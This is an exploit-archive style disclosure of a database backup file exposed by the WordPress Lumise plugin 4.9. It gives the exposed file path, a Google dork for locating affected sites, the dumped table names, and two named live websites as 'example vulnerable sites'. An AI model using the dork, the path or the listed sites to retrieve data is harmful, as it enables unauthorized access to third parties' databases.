################################################################################################# # Exploit Title : WordPress Lumise Plugins 4.9 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 17/12/2018 # Vendor Homepage : wordpress.org ~ sequelpro.com ~ lumise.com + codecanyon.net/category/wordpress?tags=lumise # Software Download Link : codecanyon.net/item/lumise-product-designer-woocommerce-wordpress/21222684 # Tested On : Windows and Linux # Category : WebApps # Version Information : WordPress 4.7.x - 4.9.x + Compatible With : WooCommerce 3.0.x - 3.2.x # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/lumise/woo/'' + intext:''Projetado por "AgAancia dPublicidade"'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/lumise/woo/sample/database.txt ################################################################################################# # Example SQL Dump Some Informations and SQL Tables Dumps => # ************************************************************ # Sequel Pro SQL dump # Version 4541 # # sequelpro.com/ # github.com/sequelpro/sequelpro # # Host: (MySQL 5.7.18) # Database: lumise ************************************************************ # Dump of table lumise_bugs # Dump of table lumise_categories # Dump of table lumise_categories_reference # Dump of table lumise_cliparts # Dump of table lumise_designs # Dump of table lumise_fonts # Dump of table lumise_guests # Dump of table lumise_languages # Dump of table lumise_order_products # Dump of table lumise_orders # Dump of table lumise_printings # Dump of table lumise_products # Dump of table lumise_settings # Dump of table lumise_shapes # Dump of table lumise_shares # Dump of table lumise_tags # Dump of table lumise_tags_reference # Dump of table lumise_templates # Dumping data for table `lumise_products` # Dumping data for table `lumise_shapes` # Dumping data for table `lumise_settings` INSERT INTO `lumise_products` (`id`, `name`, `price`, `product`, `thumbnail`, `thumbnail_url`, `template`, `description`, `stages`, `color`, `change_color`, `attributes`, `printings`, `active`, `created`, `updated`, `order`, `size`, `orientation`) VALUES INSERT INTO `lumise_settings` (`id`, `key`, `value`, `created`, `updated`) VALUES ################################################################################################# # Example Vulnerable Sites => [+] mvmprint.bg/wp-content/plugins/lumise/woo/sample/database.txt [+] criefacil.com/wp-content/plugins/lumise/woo/sample/database.txt ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################